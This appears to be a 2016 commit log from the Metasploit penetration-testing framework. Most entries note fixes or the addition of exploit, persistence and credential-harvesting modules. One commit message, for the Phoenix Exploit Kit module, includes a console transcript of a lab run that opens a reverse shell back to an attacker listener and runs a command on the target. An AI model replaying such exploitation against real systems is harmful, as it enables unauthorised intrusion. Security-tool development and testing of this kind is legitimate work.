ba6c2117cf
Fix msftidy issues
2016-09-02 18:18:43 +03:00
144fb22c32
Add Kaltura PHP Remote Code Execution module
2016-09-02 18:09:53 +03:00
81bc6bd672
Land #7228 , Create zabbix_toggleids_sqli auxiliary module
2016-09-01 16:33:17 -05:00
b0e45341e5
Update redis file_upload to optionally FLUSHALL before writing
...
This increases the chances that the uploaded file will be usable as-is
rather than being surround by the data in redis itself.
2016-08-31 14:27:18 -07:00
874fec4e31
Update zabbix_toggleids_sqli.rb
2016-08-31 17:23:16 -04:00
d43380330e
Update zabbix_toggleids_sqli.rb
2016-08-31 17:18:28 -04:00
05278c868e
Updated JCL cmd payloads to use PR7007 format
...
PR7007 centralized JCL job card for any JCL cmd payload. This PR simply
uses that new format for existing JCL cmd payloads. No functionality
for these payloads was changed, added or deleted.
2016-08-31 14:39:01 -05:00
d65ca818ea
Add validation of session type
2016-08-31 11:29:04 -05:00
ce7d4cf7f7
Removed "shell" from SessionTypes
...
Remove the need to check for the session type manually. It will be automatically validated at the time of module run.
2016-08-31 00:12:31 -05:00
401044ee43
Fix error when saving creds
2016-08-30 16:49:31 -05:00
445a43bd97
Trim the fat
2016-08-30 15:56:51 -05:00
1b505b9b67
Fix #7247 , Fix GlassFish on Windows targets
...
Fix #7247
2016-08-30 15:46:08 -05:00
e403df57e0
Land #7251 , CPORT fix for smb_login
2016-08-30 00:52:22 -05:00
ea7721608b
Land #7248 , CredEnumerateA fix for enum_cred_store
2016-08-29 15:12:23 -05:00
7a412031e5
Convert phoenix_exec to ARCH_PHP
2016-08-29 14:14:22 -05:00
43a9b2fa26
Fix missing return
...
My bad.
2016-08-29 14:13:18 -05:00
d50a6408ea
Fix missed Twitter handle
2016-08-29 13:46:26 -05:00
f8fa090ec0
Fix one more missed comma
2016-08-29 13:40:55 -05:00
53516d3323
Fix #7220 , phoenix_exec module cleanup
2016-08-29 13:28:15 -05:00
b21ea2ba3f
Added code to assign CPORT value to the parent scanner object
2016-08-29 13:17:10 -05:00
bc6a529388
Added some error checking to CredEnuerateA() railgun call
2016-08-26 16:21:54 -05:00
748c959cba
forgot to save before PR
2016-08-25 21:45:17 -04:00
5dff01625d
working code
2016-08-25 21:32:25 -04:00
226ded8d7e
Land #6921 , Support basic and form auth at the same time
2016-08-25 16:31:26 -05:00
52b81f32b1
Land #7238 , Add DETECT_ANY_AUTH to smb_login
2016-08-25 11:52:14 -05:00
4a6b2ef8de
fixing typo for reference for golden ticket
2016-08-24 10:55:36 -05:00
83160b7e49
Land #7173 , Add post module to compress (zip) a file or directory
2016-08-24 09:38:04 -05:00
cd858a149f
Add DETECT_ANY_AUTH to make bogus login optional
2016-08-23 23:05:47 -05:00
89c3b6f399
Remove the -d flag for Linux machines
2016-08-23 18:43:50 -05:00
03e14ec86f
Land #7232 , Net::SSH Regression Fixes
...
Fixes #7160
Fixes #7175
Fixes #7229
2016-08-23 14:53:42 -05:00
38a8d21e5b
Update zabbix_toggleids_sqli.rb
2016-08-22 18:57:25 -05:00
6b9635d7a5
Rename zabbix_toggleids_sqli to zabbix_toggleids_sqli.rb
2016-08-22 18:52:16 -05:00
20947cd6cd
remove old dependency on net-ssh moneykpatch
...
the ssh_login_pubkey scanner relied on functionality that
was monkeypatched into our vendored copy. this was an uneeded solution
in the first palce, and we now use a more sane method of accomplishing
the same thing
2016-08-22 10:54:09 -05:00
f2e2cb6a5e
cant transfer file
2016-08-21 19:42:29 -04:00
6306fa5aa5
Per discussion in #7195 , trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe)
2016-08-21 19:16:04 -04:00
2abf71a3ac
Create zabbix_toggleids_sqli
2016-08-21 12:43:20 -05:00
ee89b20ab7
remove 'BadChars'
2016-08-19 23:49:11 +08:00
e3d1f8e97b
Updated the description
2016-08-19 22:22:56 +08:00
5a4f0cf72f
run msftidy
2016-08-19 21:56:02 +08:00
c66ea5ff8f
Correcting the date based on the EDB
2016-08-19 21:47:57 +08:00
d4c82868de
Add Phoenix Exploit Kit Remote Code Execution
...
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.
```
msf exploit(phoenix_exec) > show options
Module options (exploit/multi/http/phoenix_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.52.128 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /Phoenix/includes/geoip.php yes The path of geoip.php which is vulnerable to RCE
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.52.129 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Phoenix Exploit Kit / Unix
msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit
[*] Started reverse TCP double handler on 192.168.52.129:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400
uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
2016-08-19 21:29:55 +08:00
b081dbf703
Make destination required
2016-08-18 15:56:16 -05:00
3eb3c5afa2
Land #7215 , Fix drupal_coder_exec bugs #7215
2016-08-18 13:43:23 -05:00
bc9a402d9e
Land #7214 , print_brute ip:rport fix
2016-08-17 22:48:40 -05:00
2b6576b038
Land #7012 , Linux service persistence module
2016-08-17 22:45:35 -05:00
c64d91457f
Land #7003 , cron/crontab persistence module
2016-08-17 22:45:16 -05:00
2fa4c7073b
Land #6995 , SSH key persistence module
2016-08-17 22:44:57 -05:00
60937ec5e9
If user is SYSTEM, then steal a token before decompression
2016-08-17 16:56:09 -05:00
4228868c29
Clean up after yourself
...
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
1f63f8f45b
Don't override payload
...
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
b3402a45f7
Add generic payloads
...
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00
5f8ef6682a
Fix #7202 , Make print_brute print ip:rport if available
...
Fix #7202
2016-08-16 15:34:30 -05:00
870669bdf7
handle exception in getsystem module
2016-08-15 23:51:05 -05:00
2fed51bb18
Land #7115 , Drupal CODER exploit
2016-08-15 01:15:23 -05:00
62d28f10cb
Clean up Mehmet modules
2016-08-15 01:12:58 -05:00
d34579f1f0
Land #7203 , Fix struts_default_action_mapper payload request delay
2016-08-12 23:00:44 -05:00
1733d3e1f1
remove obsolete tested-on comment
2016-08-12 17:26:43 -05:00
1e7663c704
Land #7200 , Rex::Ui::Text cleanup
2016-08-12 16:22:55 -05:00
b4846e5793
Enabling cmd_bash payload type with bash-tcp cmd
2016-08-13 00:14:25 +03:00
d38e9f8ceb
Using # instead of ;. Semicolon is causing msg in error.log.
2016-08-12 23:35:29 +03:00
f4e4a5dcf3
Fix struts_default_action_mapper payload request delay
...
MS-1609
2016-08-12 15:29:00 -05:00
ba79579202
Extending Space limitation up to 250
2016-08-12 22:32:49 +03:00
1a7286f625
Land #7062 , Create exploit for WebNMS 5.2 RCE
2016-08-12 07:11:48 -07:00
c2c05a820a
Force uripath and srvport options
2016-08-10 18:25:45 -05:00
e56e801c12
Update ie_sandbox_findfiles.rb
2016-08-10 18:09:58 -05:00
eb73a6914d
replace old rex::ui::text::table refs
...
everywhere we called the class we have now rewritten it
to use the new namespace
MS-1875
2016-08-10 13:30:09 -05:00
87b27951cf
Fixed some build errors
2016-08-09 20:46:49 +02:00
79a84fb320
Internet Explorer iframe sandbox local file name disclosure vulnerability
...
It was found that Internet Explorer allows the disclosure of local file
names. This issue exists due to the fact that Internet Explorer behaves
different for file:// URLs pointing to existing and non-existent files.
When used in combination with HTML5 sandbox iframes it is possible to
use this behavior to find out if a local file exists. This technique
only works on Internet Explorer 10 & 11 since these support the HTML5
sandbox. Also it is not possible to do this from a regular website as
file:// URLs are blocked all together. The attack must be performed
locally (works with Internet zone Mark of the Web) or from a share.
2016-08-09 20:35:42 +02:00
de16a6d536
Land #7182 , Nuuo / Netgear Surveillance admin password reset module
2016-08-08 16:10:30 -05:00
c64e1b8fe6
Land #7181 , NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance
2016-08-08 16:04:33 -05:00
cb04ff48bc
Land #7180 , Add exploit for CVE 2016-5674 / Nuuo / Netgear unauth RCE
2016-08-08 15:55:39 -05:00
8654baf3dd
Land #6880 , add a module for netcore/netdis udp 53413 backdoor
2016-08-08 15:43:34 -05:00
f98efb1345
Fix typos
2016-08-08 15:41:03 -05:00
7ca7682d17
Fix whitespace error from msftidy
2016-08-08 17:57:03 +01:00
3d1289dac3
Land #7185 , Add VMware Host Guest Client Redirector DLL Hijack Exploit
2016-08-08 11:41:40 -05:00
51c457dfb3
Update vmhgfs_webdav_dll_sideload
2016-08-08 11:40:03 -05:00
ae59c4ae74
Land #6687 , Fix meterpreter platform to include OS in the tuple for all meterpreters
2016-08-07 05:00:24 -05:00
3b64b891a6
Update nuuo_nvrmini_unauth_rce.rb
2016-08-05 21:53:25 +01:00
746ba4d76c
Add bugtraq reference
2016-08-05 21:53:08 +01:00
106f26587e
Add bugtraq reference
2016-08-05 21:52:46 +01:00
230903562f
Add Samsung Security Manager 1.5 ActiveMQ Broker exploit
2016-08-05 15:19:22 -05:00
dae1679245
Fixed build warnings
2016-08-05 20:40:41 +02:00
02e065dae6
Fixed disclosure date format
2016-08-05 20:32:58 +02:00
97d11a7041
Exploit module for CVE-2016-5330 VMware Host Guest Client Redirector DLL hijack
2016-08-05 20:19:40 +02:00
07e210c143
Add changes requested to target.uri
2016-08-04 17:50:16 +01:00
036d0502db
Add github link
2016-08-04 17:38:45 +01:00
2aca610095
Add github link
2016-08-04 17:38:31 +01:00
7d8dc9bc82
Update nuuo_nvrmini_unauth_rce.rb
2016-08-04 17:38:14 +01:00
ec67db03f1
add exploit for CVE 2016-5676
2016-08-04 16:56:16 +01:00
b48518099c
add exploit for CVE 2016-5674
2016-08-04 16:55:21 +01:00
0deac80d61
add exploit for CVE 2016-5675
2016-08-04 16:54:38 +01:00
14a387e4eb
Land #7163 , Add exploit payload delivery via SMB
2016-08-03 14:44:59 -05:00
2f6e0fb58c
Land #7172 , Add exploit for CVE-2016-0189 (MSIE)
2016-08-03 14:14:16 -05:00
e16c57ed07
Lower rank
2016-08-03 14:02:47 -05:00
96dbf627ae
Remove unwanted metadata for HttpServer
2016-08-03 13:55:58 -05:00
45801bc44e
get_env
2016-08-03 11:11:34 -05:00
bddf5edcf1
Fix typo
2016-08-03 11:04:53 -05:00
554a0c5ad7
Deprecate nbname_probe, which duplicate nbname as of 77cd6dbc8b
2016-08-02 17:36:22 -07:00
8f7d0eae0c
Fix #7155 - Add post module to compress (zip) a file or directory
...
Fix #7155
2016-08-02 14:44:58 -05:00
be4f55aa2f
forgot to update ranking
2016-08-02 13:30:12 -05:00
4c15e5e33a
Land #7171 , Hint about incorrect RAILSVERSION
2016-08-01 15:40:27 -05:00
160c49721b
Land #7166 , Fix empty output in nbns_response
2016-08-01 14:52:33 -05:00
abf435d6c2
Land #6960 , Auth bypass for Polycom HDX video endpoints
2016-08-01 14:02:50 -05:00
5309f2e4fb
endpoints, not end points
2016-08-01 14:02:17 -05:00
b34201e65c
restore session as an instance variable
2016-08-01 13:58:54 -05:00
ba0da52274
msftidy cleanup
2016-08-01 13:36:05 -05:00
21e6211e8d
add exploit for cve-2016-0189
2016-08-01 13:26:35 -05:00
3b13adba70
Hint about incorrect RAILSVERSION
...
If the secret doesn't match, you might have set the wrong RAILSVERSION.
The difference is secret_token (Rails 3) vs. secret_key_base (Rails 4).
2016-08-01 09:36:25 -07:00
e699d3f05b
Fix empty output in nbns_response
...
Normally, the module prints nothing unless VERBOSE is true. In practice,
we at least want to see responded-to hosts. We leave details to be
printed when VERBOSE is set.
2016-07-31 09:47:19 -07:00
d46c3a1d8c
Collector looks like hex, store it as a string
2016-07-29 21:57:51 -05:00
b61aaef03e
Fix undercase issue with userlist.dat
...
Remove the 2nd element of the array at line 102.
Add .downcase for line 103.
Fix to find filenames on systems that created the userlist.dat on uppercase.
2016-07-29 15:54:34 -05:00
1d6fa11c4f
Addition of SMB delivery module
2016-07-29 14:58:30 -04:00
1e1866f583
Fix #7158 , tiki_calendar_exec incorrectly reports successful login
...
Fix #7158
2016-07-28 17:03:31 -05:00
6c7cc061ea
Minor formatting tweaks.
2016-07-28 16:29:42 -05:00
ef2899dfd4
msftidy updates
2016-07-28 16:29:42 -05:00
7b4bb75294
Create avira_password.rb
2016-07-28 16:29:42 -05:00
af137f3ec3
Land #7127 , Fix #6989 , scanner modules printing RHOST in progress messages
2016-07-27 09:16:08 -07:00
288b39e37f
update to mettle 0.0.6
2016-07-27 08:59:21 -05:00
864989cf6c
For echo command
2016-07-26 20:27:23 -05:00
4720d77c3a
Land #6965 , centreon useralias exec
2016-07-26 15:02:36 -07:00
dadafd1fdf
Use data:// instead of bogus web server and check() improvements.
2016-07-26 13:31:46 +03:00
cce1ae6026
Fix #6989 , scanner modules printing RHOST in progress messages
...
Fix #6989
2016-07-25 23:15:59 -05:00
df15eebdf8
Land #7106 , multiple keylog_recorder improvements
2016-07-25 14:54:06 -05:00
1016cb675d
Land #7107 , Use VHOST info for redirection in firefox_proto_crmfrequest
2016-07-24 15:50:21 -05:00
72caeaa72f
Fix redirect url
2016-07-24 15:49:03 -05:00
780e83dabb
Fix for Opt params and Space limits
2016-07-22 20:48:15 +03:00
352d63480d
scriptjunkie's recs and fixes additional issues
2016-07-21 22:54:48 -05:00
7e9c5f9011
Fix for double space and indentation
2016-07-21 20:27:52 +03:00
634ee93de4
Add Drupal CODER remote command execution
2016-07-21 20:23:54 +03:00
32f1c83c9e
Switch to single quotes
...
Might as well, since we're avoiding escaping.
2016-07-21 00:10:17 -05:00
2e631cab5b
Prefer quoting over escaping
...
Having to escape backslashes in a single-quoted string sucks.
2016-07-21 00:02:08 -05:00
c6b309d5c9
Fix drupal_restws_exec check method false positive
2016-07-20 23:28:49 -05:00
8bd6db8bd7
Land #7108 , Drupal RESTWS exploit
2016-07-20 13:49:37 -05:00
b49a847c98
Fix additional things
2016-07-20 13:49:23 -05:00
51bb950201
Avoid return where not required
2016-07-20 21:27:51 +03:00
b0a0544627
Remove random string from URI
2016-07-20 20:50:10 +03:00
c93e88f3a3
Make changes requested by wvu-r7
2016-07-20 14:21:04 +02:00
b057a9486c
Don't use ssh agent
2016-07-19 17:07:22 -05:00
ff63e6e05a
Land #7018 , unvendor net-ssh
2016-07-19 17:06:35 -05:00
089816236d
Remove double spaces and fix checkcode
2016-07-20 00:01:25 +03:00
9c8e351ba8
Use vars_get un send_request_cgi
2016-07-19 20:12:14 +03:00
ec2f8fcc71
Change check method and use meterpreter instead of unix cmd
2016-07-19 11:13:06 +03:00
6f35a04e21
Incorporate review fixes, ensure PrependFork is true, fix echo compat.
2016-07-19 01:45:56 -05:00
650034b600
Use normalize_uri params instead of string concatenation
2016-07-19 01:01:05 +03:00
c8deb54938
Add Drupal RESTWS Remote Unauth PHP Code Exec
2016-07-18 21:32:10 +03:00
14c9569afa
2013-1710 - Use header VHOST info for redirection
...
When this exploit is hit by hostname, the HTTP request contains
a Host header field which does not match the IP-based redirection.
Update the module to check request headers for host information,
and fallback to the prior behavior if none exists.
Tested in conjunction with #6611 DNS spoofer - works great, see
issue #7098 for details.
2016-07-17 04:50:54 -04:00
722133491d
Wording change in advanced options and doc
2016-07-16 22:57:36 -05:00
9cb9a2f69d
Update for windows keylog_recorder
2016-07-16 22:38:10 -05:00
dcd09f17bd
New Post Module
...
New post module for windows.
It gathers the users and cracks the password of MDaemon Mail server.
NOTE: The module have a bug and I would appreciate help fixing it (problem when storing credentials)
2016-07-16 19:07:27 -05:00
e3801c425b
Fix typo in USB error message
2016-07-16 09:43:48 -04:00
Mehmet Ince
Brendan
Jon Hart
Brandon Perry
bigendian smalls
AgoraSecurity
wchen-r7
William Vu
h00die
Pearce Barry
Louis Sato
David Maloney
Jay Turla
William Webb
Brent Cook
Brent Cook
Yorick Koster
Yorick Koster
Pedro Ribeiro
Steven Seeley
James Lee
Andrew Smith
Robert Kugler
Vex Woo
Josh Hale
forzoni
RageLtMan
ktreimann